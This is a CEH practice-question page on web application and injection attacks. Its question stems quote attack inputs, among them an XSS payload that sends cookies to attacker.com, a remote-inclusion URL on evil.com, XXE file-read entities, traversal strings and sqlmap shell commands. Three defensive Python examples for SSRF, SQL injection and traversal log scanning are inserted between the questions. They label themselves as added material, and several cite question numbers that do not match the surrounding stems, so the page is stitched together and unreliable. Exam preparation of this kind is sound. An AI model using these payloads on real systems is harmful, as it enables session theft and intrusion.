Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.


Web Application and Injection Attacks

Practice CEH Web Application and Injection Attacks questions with full explanations on every answer.

All CEH Web Application and Injection Attacks questions (172)

1

A security analyst notices that the web application returns different response times when a valid username is submitted versus an invalid one during login. Which type of vulnerability is likely being exploited?

2

Which of the following tools is commonly used to automate the detection and exploitation of SQL injection vulnerabilities?

3

A penetration tester intercepts the following request using Burp Suite:

POST /change_password HTTP/1.1
Host: example.com
Cookie: sessionid=abc123; SameSite=Lax
Content-Type: application/x-www-form-urlencoded

new_password=Hacker123

The tester successfully crafts a CSRF attack by embedding a hidden form in a malicious page. Which mitigation is most likely missing?

4

A web application allows users to upload profile pictures. An attacker uploads a file named "profile.php" containing malicious PHP code. When the attacker visits the uploaded file's URL, the code executes. Which vulnerability is being exploited?

5

An analyst observes the following log entry on a web server: GET /../../etc/passwd HTTP/1.1 200. Which type of attack is indicated?

6

During a penetration test, a tester uses the following payload in a search field: <script>alert(document.cookie)</script>. The payload is reflected in the response without sanitization. However, the tester notices that the attack only works when the payload is submitted via a POST request, not GET. Which type of XSS is this?

7

Which of the following is the primary purpose of using a CSRF token in a web application?

8

A web application uses user input in the following PHP code: include($_GET['page'] . '.php');. An attacker submits the URL: http://example.com/index.php?page=../../../../etc/passwd%00. Which two vulnerabilities are being attempted?

9

Which Burp Suite tool is most appropriate for modifying and re-sending a single HTTP request multiple times with different payloads to test for SQL injection?

10

A penetration tester finds that a web application accepts XML input and returns the parsed data in the response. The tester submits the following payload: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The server returns the contents of /etc/passwd. Which vulnerability is being exploited?

11

An attacker attempts to log into a web application by trying many common passwords for a list of known usernames. Which type of authentication attack is this?

12

A security analyst wants to check if a web application is vulnerable to Server-Side Request Forgery (SSRF). Which of the following actions would be most effective?

13

Which TWO of the following are effective mitigations against Cross-Site Request Forgery (CSRF)?

14

A web application is vulnerable to SQL injection. Which THREE of the following techniques can be used to extract data from the database using blind SQL injection?

15

Which TWO of the following are characteristics of stored (persistent) XSS?

16

A security analyst observes that after a user submits a comment on a blog, the comment is displayed immediately on the page without sanitization. Another user visits the page and the comment's JavaScript executes in their browser. Which type of XSS attack is this?

17

Which of the following tools is primarily used for automated SQL injection exploitation and database fingerprinting?

18

A penetration tester needs to perform a brute-force attack on a web application login form. Which Burp Suite tool is specifically designed for automating parameterized attacks like password guessing?

19

A web application uses a parameter 'file' to include server-side files. The following request is intercepted: GET /page.php?file=../../../etc/passwd HTTP/1.1. The response contains the contents of /etc/passwd. This vulnerability is most likely which of the following?

20

Which of the following is a recommended defense against Cross-Site Request Forgery (CSRF) attacks?

21

A tester sends the following payload to a web application: %3Cscript%3Ealert('XSS')%3C/script%3E. The application echoes back the decoded payload in the response without sanitization. This behavior is typical of which type of vulnerability?

22

An attacker discovers that a web application's login form allows unlimited login attempts. The attacker uses a list of usernames and passwords obtained from a previous breach to gain access. This attack is known as:

23

A penetration tester is assessing a web application and notices that the application reflects the User-Agent header in the response body without sanitization. What attack could be performed using this behavior?

24

An attacker sends a request to a web server with the following header: X-Forwarded-For: 127.0.0.1. The server processes the request as if it came from localhost and grants administrative access. This is an example of:

25

Which of the following is a symptom of a successful command injection attack?

26

A web developer wants to mitigate CSRF attacks. Which of the following configurations for cookies is most effective when combined with CSRF tokens?

27

During an assessment, a tester discovers that the web application accepts XML input and returns the parsed data. The tester submits the following payload: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The response contains the contents of /etc/passwd. This vulnerability is known as:

28

Which TWO of the following are effective defenses against SQL injection attacks?

29

Which THREE of the following are common indicators of an ongoing brute-force attack against a web application?

30

Which TWO of the following are valid methods to exploit or test for Server-Side Request Forgery (SSRF)?

31

A security analyst notices that after submitting a form on a web application, the URL changes to include the user's ID parameter, e.g., 'user?id=123'. The analyst modifies the ID in the URL and accesses another user's profile without authorization. Which type of vulnerability is being exploited?

32

Which Burp Suite tool is specifically designed to automate customized attacks on web applications, such as brute-forcing login forms or fuzzing parameters?

33

During a penetration test, a tester uses SQLMap with the following command: 'sqlmap -u "http://target.com/page?id=1" --os-shell'. The target is a Linux server running MySQL. Which SQL injection technique will SQLMap likely attempt to use to achieve an OS shell?

34

A web application allows users to upload profile pictures. The application uses the filename provided by the user to save the file on the server. An attacker uploads a file named 'malicious.php%00.png' and the server saves it as 'malicious.php'. Which vulnerability is being exploited?

35

Which of the following is the BEST defense against brute-force attacks on a login form?

36

A penetration tester discovers that a web application includes the following code: 'include($_GET['page'] . '.php');' and the application is running on a Linux server. The tester attempts to exploit this by accessing 'index.php?page=../../etc/passwd'. What type of attack is this, and will it succeed?

37

An attacker wants to perform a CSRF attack against a banking application. The application uses SameSite cookies set to 'Strict'. The attacker hosts a malicious page on their own domain. When the victim visits the malicious page, which of the following statements is TRUE regarding the CSRF attack?

38

A web application uses XML to transmit data between client and server. A tester submits the following payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. The application returns the content of the /etc/passwd file in the response. Which vulnerability is present?

39

During a web application test, an analyst intercepts a request containing a 'Referer' header that points to a different domain. The analyst modifies the request by removing the 'Referer' header and the action still executes successfully. Which type of attack is the analyst testing?

40

Which of the following is a common indicator of a stored (persistent) Cross-Site Scripting (XSS) attack?

41

A web application firewall (WAF) blocks requests containing ' UNION SELECT '. A penetration tester wants to bypass this restriction to perform a union-based SQL injection. Which of the following techniques is MOST likely to succeed?

42

An organization wants to prevent directory listing on its Apache web server. Which of the following configuration changes would achieve this?

43

Which TWO of the following are effective mitigations against Clickjacking attacks? (Choose 2)

44

Which THREE of the following are types of SQL injection attacks? (Choose 3)

45

Which TWO of the following are common tools used for web application security testing? (Choose 2)

46

A security analyst notices that a web application returns different page sizes when a valid user ID is submitted versus an invalid one in the URL parameter. Which type of vulnerability is most likely being exploited?

47

Which of the following tools is specifically designed to automate the process of detecting and exploiting SQL injection vulnerabilities in web applications?

48

During a web application penetration test, a tester submits a comment containing '<script>alert("XSS")</script>' and the script executes for all users who view the comment. Which type of cross-site scripting (XSS) vulnerability is present?

49

A web application uses a URL parameter to fetch a file from the server, e.g., 'download.php?file=report.pdf'. An attacker changes the parameter to '../../etc/passwd' and retrieves the password file. This attack is known as:

50

Which of the following is the most effective defense against Cross-Site Request Forgery (CSRF) attacks?

51

An attacker intercepts a request and notices that the server reflects the value of the 'User-Agent' header in the response without sanitization. The attacker crafts a payload that triggers an alert box. This is an example of:

52

In Burp Suite, which tool is used to modify and resend individual HTTP requests to observe responses, allowing manual testing of input validation and parameter manipulation?

53

A penetration tester finds that a web application allows uploading a file with the name '../../var/www/html/shell.php'. The file is successfully written to the server. Which combination of vulnerabilities does this exploit?

54

Which of the following best describes a Server-Side Request Forgery (SSRF) attack?

55

A web application uses XML to transfer data. An attacker submits the following payload: '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. What vulnerability is being exploited?

56

Which of the following is a common defense against clickjacking attacks?

57

A security analyst observes the following in Apache access logs: 'GET /cgi-bin/test.cgi?cmd=id HTTP/1.1' 200. This is most likely an attempt at which attack?

58

Which TWO of the following are types of SQL injection? (Select 2)

59

Which THREE of the following are effective mitigations against brute force attacks on web application login forms? (Select 3)

60

Which TWO of the following attacks can be prevented by properly validating and sanitizing user input? (Select 2)

61

A security analyst notices that the web application returns different response times when querying user IDs. For example, a valid user ID returns the page in 2 seconds, while an invalid ID returns in 0.5 seconds. The analyst suspects a blind SQL injection vulnerability. Which SQL injection technique is MOST likely being used?

62

Which OWASP Top 10 (2021) category describes the vulnerability where an application allows an attacker to include a remote file from an external server, leading to code execution or data disclosure?

63

During a web application penetration test, a tester uses Burp Suite's Repeater tool to manually manipulate a request and observe the response. After sending the same request multiple times, the application returns a 302 redirect pointing to a login page. What is the MOST likely cause?

64

A penetration tester is testing an IIS web server and wants to exploit a WebDAV misconfiguration to upload a web shell. Which HTTP method should the tester check to determine if WebDAV is enabled and allows file uploads?

65

A security analyst identifies a vulnerability where an attacker can include a local file such as '/etc/passwd' by manipulating the 'page' parameter in the URL: http://example.com/index.php?page=../../../../etc/passwd. What type of attack is this?

66

Which of the following is a primary purpose of the SameSite cookie attribute in mitigating CSRF attacks?

67

A penetration tester is using SQLMap to automate exploitation of a SQL injection vulnerability found in a login form. The tester wants to retrieve the names of all databases on the backend MySQL server. Which SQLMap flag should be used?

68

During a penetration test, the tester finds that the Apache server is configured with directory listing enabled on the /uploads directory. The tester navigates to http://example.com/uploads/ and sees a list of files. Which of the following is the MOST immediate security concern?

69

A web application is vulnerable to server-side request forgery (SSRF). An attacker sends a request that causes the server to make an internal HTTP request to http://169.254.169.254/latest/meta-data/. What is the attacker attempting to achieve?

70

Which of the following describes the difference between reflected and stored (persistent) cross-site scripting (XSS)?

71

A security analyst observes that a web application allows users to submit feedback, and after submission, the feedback is displayed on a public page. An attacker submits feedback containing the script: <script>document.location='http://attacker.com/?c='+document.cookie</script>. When an admin views the public page, the script executes. Which type of attack occurred?

72

During a security assessment, a tester discovers an endpoint that reflects the 'User-Agent' header in the response without sanitization. The tester wants to confirm a reflected XSS vulnerability. Which of the following payloads would be MOST effective to demonstrate the issue in a single request?

73

Which TWO of the following are effective defenses against CSRF attacks? (Choose 2.)

74

Which THREE of the following are common indicators of an SQL injection attack? (Choose 3.)

75

Which TWO of the following are valid techniques used in password spraying attacks? (Choose 2.)

76

A security analyst notices that a web application returns different HTTP responses for valid and invalid usernames during login. Which attack is this behavior most likely facilitating?

77

Which of the following tools is specifically designed to automate the detection and exploitation of SQL injection vulnerabilities?

78

A penetration tester discovers that a web application's search functionality reflects user input directly in the page source without sanitization. The tester crafts a URL like http://example.com/search?q=<script>alert('XSS')</script> and the script executes. This is an example of which type of XSS?

79

During a web application assessment, a tester intercepts a request and modifies the 'Referer' header. The application then performs a state-changing action without requiring a token. Which vulnerability is most likely present?

80

A web application allows users to access files using parameters like 'file=report.pdf'. A tester changes the parameter to '../../etc/passwd' and retrieves the system password file. This is an example of which attack?

81

A security team is implementing measures to prevent cross-site request forgery (CSRF) attacks. Which of the following is the most effective mitigation technique?

82

An analyst notices that a web application's login page returns a generic 'Invalid credentials' message regardless of whether the username is valid. This is an example of which security control?

83

A web server is configured with WebDAV and allows PUT requests. An attacker uploads a .asp file and accesses it to execute code. Which tool or method is most directly associated with exploiting this misconfiguration?

84

A penetration tester uses a tool to intercept and modify HTTP/HTTPS requests in real-time between the browser and the web application. Which tool is being used?

85

An application is vulnerable to server-side request forgery (SSRF). An attacker exploits this to access internal services. Which of the following is a common indicator of SSRF?

86

Which of the following best describes the attack where an attacker uses a valid session token to impersonate a user without needing to authenticate?

87

A security analyst is reviewing a web application log and sees the following request: GET /page?file=../../../etc/passwd HTTP/1.1. Which TWO vulnerabilities are most likely being attempted? (Select two)

88

Which THREE of the following are common types of SQL injection attacks? (Select three)

89

An application uses the SameSite cookie attribute. Which TWO of the following are valid values for this attribute and their purposes? (Select two)

90

During a penetration test, a tester observes that a web application's login form does not implement rate limiting and returns different error messages for valid vs. invalid usernames. Which THREE attacks are most likely to be successful? (Select three)

91

A security analyst notices that a web application returns different error messages for valid and invalid usernames during login. Which type of attack is this application MOST vulnerable to?

92

During a penetration test, you identify a parameter in a web application that appears to fetch a file from the server. You modify the parameter to '../../../etc/passwd' and see the contents of the passwd file. Which type of vulnerability is this?

93

Which of the following is the BEST defense against Cross-Site Request Forgery (CSRF) attacks?

94

A web application allows users to submit feedback that is stored in a database and displayed to other users without proper sanitization. A tester inputs '<script>alert(1)</script>' and it executes when other users view the feedback. Which type of XSS is this?

95

A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page.php?id=1' --batch --dbs. Which database enumeration technique is SQLMap using by default?

96

A web server is found to have directory listing enabled for the /uploads folder. An attacker discovers a shell.php file uploaded earlier. Which attack is the attacker MOST likely to perform next?

97

A security team wants to test their web application for vulnerabilities. Which Burp Suite tool is BEST suited for automating attacks like brute-force or fuzzing?

98

A web application has an endpoint that takes a URL parameter and fetches content from that URL, returning it to the user. An attacker supplies 'file:///etc/passwd' and reads the server's passwd file. Which vulnerability is this?

99

Which of the following is a primary defense against SQL injection attacks?

100

An attacker performs a password spraying attack against a web application. Which of the following BEST describes this technique?

101

A penetration tester finds that a web application includes files based on user input without proper validation. The tester supplies 'http://attacker.com/malicious.txt' and the application includes its content. Which vulnerability is this?

102

A web application uses an XML parser to process user-supplied XML documents. An attacker submits the following payload: <?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><root>&xxe;</root>. Which vulnerability is being exploited?

103

Which TWO of the following are characteristics of a reflected Cross-Site Scripting (XSS) attack? (Select 2)

104

Which TWO of the following are commonly used to mitigate SQL injection vulnerabilities? (Select 2)

105

Which THREE of the following are valid defenses against CSRF attacks? (Select 3)

106

During a web application penetration test, a security analyst intercepts a request using Burp Suite and notices the following parameter in the URL: /profile?user_id=123. By changing the user_id to 124, the analyst is able to view another user's profile. Which vulnerability is being exploited?

107

A security team discovers that their web application is vulnerable to a Server-Side Request Forgery (SSRF) attack. Which of the following is the MOST effective mitigation technique to prevent SSRF?

108

Which of the following tools is specifically designed to automate the exploitation of SQL injection vulnerabilities and retrieve data from databases?

109

A penetration tester identifies a web page that reflects user input in the response without proper encoding. The input is submitted via a GET parameter. Which type of cross-site scripting (XSS) is MOST likely present?

110

A security analyst is reviewing HTTP response headers and notices the following: Set-Cookie: sessionId=abc123; SameSite=Lax. What is the primary purpose of the SameSite attribute?

111

During a penetration test, you find a web application that includes files using a parameter like /index.php?page=about. When you change the parameter to /etc/passwd, the application returns the contents of the password file. Which vulnerability is present?

112

Which HTTP method is commonly used by WebDAV to upload files to a web server, and if misconfigured, could allow an attacker to upload malicious scripts?

113

A web application takes a URL from user input and fetches the content to display on the page. An attacker submits a URL pointing to an internal service like http://localhost:8080/admin. The server retrieves the internal resource and returns it. What is this attack?

114

Which of the following Burp Suite tools is used to automatically fuzz web application inputs and identify common vulnerabilities like SQL injection and XSS?

115

A penetration tester attempts a SQL injection on a login form and receives no error messages, but notices a delay in the server response when injecting ' OR SLEEP(5)--. Which type of SQL injection is this?

116

After a security incident, logs show repeated login attempts from different IP addresses using a list of common passwords against a single username. Which attack technique is being used?

117

A web application allows users to upload profile images. An attacker uploads a file named 'image.php.png' with malicious PHP code, and the server executes it as PHP. Which type of vulnerability is this?

118

Which TWO of the following are effective defenses against Cross-Site Request Forgery (CSRF) attacks? (Select 2)

119

Which THREE of the following are types of SQL injection attacks? (Select 3)

120

Which TWO of the following are common indicators of a command injection vulnerability? (Select 2)

121

A web application tester notices that the application reflects user input in the URL without proper encoding. The tester submits a payload <script>alert('xss')</script> in a search field and the script executes in the browser. Which type of XSS vulnerability is this MOST likely?

122

During a penetration test, a security analyst discovers that a web application uses sequential numeric identifiers in URLs (e.g., /profile?id=100). By modifying the id parameter, the analyst can access another user's profile data without authorization. Which vulnerability is being exploited?

123

Which of the following tools is specifically designed to automate the detection and exploitation of SQL injection vulnerabilities in web applications?

124

An application allows users to upload XML files for processing. A tester uploads the following payload: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The server returns the contents of /etc/passwd. Which attack is being performed?

125

A security analyst observes that a web application's login page responds with different HTTP status codes and response times for valid versus invalid usernames. This information leakage could be used to perform which type of authentication attack?

126

Which of the following is a primary defense mechanism against Cross-Site Request Forgery (CSRF) attacks?

127

A penetration tester uses Burp Suite Repeater to manually modify and resend HTTP requests to a web server. In which phase of the testing methodology is this tool most commonly employed?

128

While analyzing web server logs, an analyst finds the following entry: GET /../../../../etc/passwd HTTP/1.1 with a 200 OK response. Which vulnerability is indicated, and what is the MOST likely impact?

129

Which of the following describes a Server-Side Request Forgery (SSRF) attack?

130

A web application tester uses the following Burp Suite feature to automatically send multiple requests with different payloads to test for common vulnerabilities. Which feature is being used?

131

An attacker exploits a vulnerable parameter in a web application by submitting the following payload: http://target.com/page.php?file=http://evil.com/shell.txt. The server returns the contents of the remote file. This is an example of which type of attack?

132

A security analyst discovers that a web application's search box reflects user input without proper sanitization. However, the attacker must trick a victim into clicking a crafted link containing the malicious script. This vulnerability is classified as which type?

133

A penetration tester is assessing a web application and wants to manually test for SQL injection vulnerabilities. Which TWO tools or techniques are best suited for this task?

134

Which THREE of the following are effective mitigation techniques against Cross-Site Scripting (XSS) attacks?

135

Which TWO of the following are common types of SQL injection attacks?

136

An analyst reviews a web server log and sees the following request: GET /search?q=<script>alert('xss')</script> HTTP/1.1. The response from the server includes the search term inside a <div> tag without any sanitization. Which type of XSS vulnerability does this indicate?

137

A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page?id=1' --batch --dbs. Which of the following best describes what this command will do?

138

An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP request to a sensitive internal service. Which type of attack is this?

139

A security analyst notices that a web application uses sequential numeric IDs for user accounts (e.g., /profile?id=1001). By changing the ID to 1002, the analyst can view another user's profile. Which vulnerability is present?

140

During a web application penetration test, a tester uses Burp Suite's Intruder tool to automate a series of login attempts using a list of common passwords. Which attack type is being performed?

141

An analyst reviews the following HTTP response:

HTTP/1.1 200 OK
Set-Cookie: sessionid=abc123; SameSite=None; Secure
...
<html><body><p>Welcome back!</p></body></html>

What possible vulnerability exists if the application does not use CSRF tokens?

142

Which of the following is the most effective defense against SQL injection attacks?

143

An attacker exploits an application by uploading a file that contains server-side script code, leading to arbitrary command execution on the web server. Which best describes this attack?

144

A security engineer observes that an internal web application uses XML to transmit data between systems. The engineer discovers that by sending a crafted XML payload, they can read sensitive files from the server's filesystem. Which attack is being performed?

145

Which Burp Suite tool is specifically designed to intercept and modify HTTP(S) traffic between the browser and the target web application?

146

A web application allows users to submit feedback that is stored in a database and later displayed to administrators. An attacker submits feedback containing <script>alert('stored')</script>. When an admin views the feedback page, the script executes. Which type of XSS is this?

147

An attacker uses the following URL pattern to access files: http://example.com/../../etc/passwd. Which attack is being attempted?

148

Which TWO of the following are effective mitigations against Cross-Site Request Forgery (CSRF) attacks? (Select 2)

149

Which THREE of the following are common indicators of a Server-Side Request Forgery (SSRF) vulnerability? (Select 3)

150

Which TWO of the following are common methods to detect SQL injection vulnerabilities in a web application? (Select 2)

151

A security analyst observes a web application returning database error messages containing table names and column names in the HTTP response. Which type of SQL injection is MOST likely being exploited?

152

During a web application test, a penetration tester intercepts a request using Burp Suite Proxy, modifies the 'Referer' header, and resends the request. The application processes the request despite the modified header. Which attack is the tester attempting to validate?

153

A web application allows users to view documents by specifying a filename in the URL, e.g., /getDocument?file=report.pdf. A tester changes the file parameter to '../../etc/passwd' and retrieves the system password file. Which vulnerability is being exploited?

154

A penetration tester uses SQLMap with the option '--technique=T --dbms=MySQL --level=5 --risk=3' against a login form. The tool returns results after a delay of several seconds per request. Which SQL injection technique is being used?

155

A security team deployed a web application firewall (WAF) that blocks requests containing SQL keywords like 'SELECT', 'UNION', and 'DROP'. An attacker bypasses the WAF by base64-encoding the payload, which the application decodes server-side before building the query. Which mitigation would be MOST effective against this?

156

Which Burp Suite tool is specifically designed to automate customized attacks against web applications, such as brute-forcing login credentials or fuzzing parameters?

157

A penetration tester discovers that a web application's login page does not enforce rate limiting and several usernames are known from a prior data breach. The tester wants to try a few common passwords across many accounts to avoid account lockouts. Which attack technique is being used?

158

A web server running IIS 8.5 is found to have WebDAV enabled with write permissions. Which attack is MOST likely to be successful against this configuration?

159

An attacker crafts a link that, when clicked by an authenticated user, performs an unintended action on a web application where the user is logged in, such as changing their email address. The application uses a session cookie for authentication but does not include any anti-forgery tokens in forms. Which attack is this?

160

A security analyst identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). Which TWO of the following are effective mitigation techniques for SSRF?
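The SSRF indicator and mitigation questions above (questions 150 and 161) both turn on the same check: before the server fetches a user-supplied URL, every address that URL can reach must be a public one. The following is an added example, not code from the original page or from any vendor; the hostnames, the document root and the DNS answers in CONSTRUCTED_DNS are made up so that it runs offline, and default_resolve() is what a real deployment would use instead of fake_resolve().

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed DNS answers (hypothetical hostnames) so the example runs offline.
# A real deployment uses default_resolve() below, which asks the system resolver.
CONSTRUCTED_DNS = {
    "api.partner.example": ["93.184.216.34"],                 # a public address
    "metadata.internal": ["169.254.169.254"],                 # cloud metadata endpoint
    "dns-rebind.example": ["93.184.216.35", "10.0.0.5"],      # one public, one private answer
}

ALLOWED_SCHEMES = {"http", "https"}


def default_resolve(host):
    """Resolve a hostname to every address it maps to (IPv4 and IPv6)."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def fake_resolve(host):
    """Offline stand-in for default_resolve() using the constructed table."""
    return CONSTRUCTED_DNS.get(host, [])


def is_internal(addr_text):
    """True if server-initiated requests must never reach this address."""
    try:
        addr = ipaddress.ip_address(addr_text)
    except ValueError:
        return True  # unparsable -> fail closed
    # Unwrap IPv4-mapped IPv6 (::ffff:127.0.0.1) so the IPv4 checks apply to it.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def is_safe_outbound_url(url, resolve=default_resolve):
    """Return True only if the URL is http(s) and every address it resolves to is public."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False  # file://, gopher://, dict:// and friends are never fetched
    host = parts.hostname
    if not host or parts.username is not None:
        return False  # no host, or user@host tricks that confuse URL parsers
    try:
        _ = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    try:
        addrs = [str(ipaddress.ip_address(host))]  # IP literal: nothing to resolve
    except ValueError:
        addrs = resolve(host)  # a decimal form like 2130706433 also lands here
    if not addrs:
        return False  # unresolvable -> fail closed
    # Reject if ANY answer is internal: a rebinding name with one public and
    # one private record must not pass because the public one was checked first.
    return not any(is_internal(a) for a in addrs)
```

The address check is done on the resolved answers rather than on the hostname string, which is why decimal, hex, IPv6-mapped and rebinding forms fall out of the same rule. The remaining gap is time-of-check versus time-of-use: the HTTP client must connect to the address that was validated (or re-validate on every redirect), otherwise a second DNS lookup at connect time can return a different answer.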

161

During a penetration test, a tester finds a web application that reflects user input in the page without sanitization. Which TWO types of XSS are potentially exploitable in this scenario?

162

An attacker is attempting to perform an Insecure Direct Object Reference (IDOR) attack on a web application. Which TWO conditions are necessary for this attack to succeed?

163

A pentester uses Burp Suite's Intruder to perform a brute-force attack on a login form. Which THREE of the following Intruder attack types would be appropriate for testing different payload combinations?

164

A web application is vulnerable to XML External Entity (XXE) injection. Which THREE of the following are potential impacts of successfully exploiting an XXE vulnerability?

165

A penetration tester is performing a check for HTTP response splitting. Which THREE of the following conditions must be present for this attack to succeed?

166

A security analyst notices that a web application's search functionality returns database error messages in the response. The analyst suspects SQL injection. Which TWO techniques should the analyst use to confirm and exploit this vulnerability? (Choose TWO.)
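Questions 150, 151, 155 and 166 above all rest on one distinction: a query built from strings lets input change the SQL grammar, a parameterized query does not, and a keyword-blocking WAF does not close that gap. The following is an added example, not code from the original page or from any product; the users table and its two rows are a constructed SQLite database, and the three probes are the ones a tester sends first.

```python
import sqlite3

BLOCKED_KEYWORDS = ("SELECT", "UNION", "DROP")  # the blocklist from the WAF scenario


def make_db():
    """Constructed in-memory sample database (not a real application)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def keyword_waf_allows(value):
    """The WAF from the scenario: it only looks for bare SQL keywords."""
    return not any(kw in value.upper() for kw in BLOCKED_KEYWORDS)


def login_vulnerable(conn, username, password):
    """String-built query: the classic SQL injection sink."""
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # Sending the driver's message back to the client is what makes
        # error-based injection possible (question 151).
        return {"ok": False, "error": str(exc)}
    return {"ok": row is not None, "error": None}


def login_parameterized(conn, username, password):
    """Same query with bound parameters: input is data and can never alter the SQL."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return {"ok": row is not None, "error": None}


def demo():
    """Run the three probes against both sinks and report what each one did."""
    conn = make_db()
    tautology = "' OR '1'='1"   # contains no blocked keyword, so the WAF passes it
    comment_out = "alice'--"    # comments out the password check entirely
    probe = "alice'"            # unbalanced quote: the first detection probe
    return {
        "waf_allows_tautology": keyword_waf_allows(tautology),
        "vuln_tautology": login_vulnerable(conn, "nobody", tautology)["ok"],
        "vuln_comment": login_vulnerable(conn, comment_out, "wrong")["ok"],
        "vuln_probe_error": login_vulnerable(conn, probe, "x")["error"],
        "safe_tautology": login_parameterized(conn, "nobody", tautology)["ok"],
        "safe_comment": login_parameterized(conn, comment_out, "wrong")["ok"],
        "safe_probe_error": login_parameterized(conn, probe, "x")["error"],
    }
```

The tautology and comment payloads log in through login_vulnerable without ever tripping the keyword WAF, which is the point of question 155: the fix is the parameterized sink, not a longer blocklist. The unbalanced-quote probe produces a driver error from the vulnerable sink and nothing from the parameterized one; when an application suppresses that error, the same probe is confirmed with a time delay instead, which is what sqlmap's --technique=T in question 154 automates.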

167

During a web application penetration test, a tester discovers a file inclusion vulnerability. Which THREE of the following are potential impacts or exploitation scenarios? (Choose THREE.)

168

A security engineer is reviewing web server logs and finds the following request: GET /files/../../../etc/passwd HTTP/1.1. Which THREE attacks could be associated with this request? (Choose THREE.)
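Questions 148, 153 and 168 above are the same directory traversal seen from three sides: the URL, the vulnerable parameter, and the log line it leaves behind. The following is an added example, not code from the original page or from any product; DOC_ROOT is an assumed document root and SAMPLE_LOG is a constructed set of access-log lines in combined-log style. It shows the server-side check that resolves the request against the root instead of searching the raw input for '..', and a log scan that decodes the target before looking for traversal so single- and double-encoded forms are counted.

```python
import posixpath
import re
from urllib.parse import unquote

DOC_ROOT = "/var/www/files"  # assumed document root for the example


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so %252e%252e (double encoding) ends up as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_document(requested, root=DOC_ROOT):
    """Map a user-supplied file name to a path inside root, or return None.

    The decision is made on the normalized absolute path, so encoded, mixed
    and nested forms ('sub/../../x') are all judged by where they end up.
    """
    name = decode_fully(requested)
    if "\x00" in name:
        return None  # a null byte would truncate the path in C-based layers below
    candidate = posixpath.normpath(posixpath.join(root, name.lstrip("/")))
    root_prefix = root.rstrip("/") + "/"
    if not candidate.startswith(root_prefix):
        return None  # escaped the root (the root directory itself is not a document)
    return candidate


# Constructed access-log lines (not real traffic): one ordinary request, a plain
# traversal, a URL-encoded one, a clean request from another host, a double-encoded one.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2026:12:00:01 +0000] "GET /files/report.pdf HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2026:12:00:02 +0000] "GET /files/../../../etc/passwd HTTP/1.1" 200 1832
203.0.113.7 - - [10/Mar/2026:12:00:03 +0000] "GET /getDocument?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 403 0
198.51.100.2 - - [10/Mar/2026:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 2048
203.0.113.7 - - [10/Mar/2026:12:00:05 +0000] "GET /files/%252e%252e/%252e%252e/etc/shadow HTTP/1.1" 200 912
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]|[/\\]\.\.$")  # '../', '..\' or a trailing '..'


def find_traversal_attempts(log_text):
    """Return one record per request whose decoded target contains a '..' segment."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_fully(m.group("target"))
        if TRAVERSAL_RE.search(decoded):
            hits.append({
                "ip": m.group("ip"),
                "target": m.group("target"),
                "status": int(m.group("status")),
                # A 200 on a traversal target means the file was most likely served.
                "served": m.group("status") == "200",
            })
    return hits
```

Two caveats for real use. posixpath.normpath is a purely lexical check; a symlink inside the root can still point outside it, so after the lexical check the opened path should be confirmed with os.path.realpath against the real root. And the log scan must decode before matching: a filter that only looks for the literal string '../' in the raw request misses the third and fifth constructed lines, which is exactly what question 168 is getting at.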

169

A penetration tester uses Burp Suite to intercept and modify web traffic. Which TWO features in Burp Suite would be MOST useful for performing a brute-force attack on a login form? (Choose TWO.)

170

A web application uses cookies for session management. The application is vulnerable to CSRF. Which THREE of the following are effective mitigation techniques? (Choose THREE.)
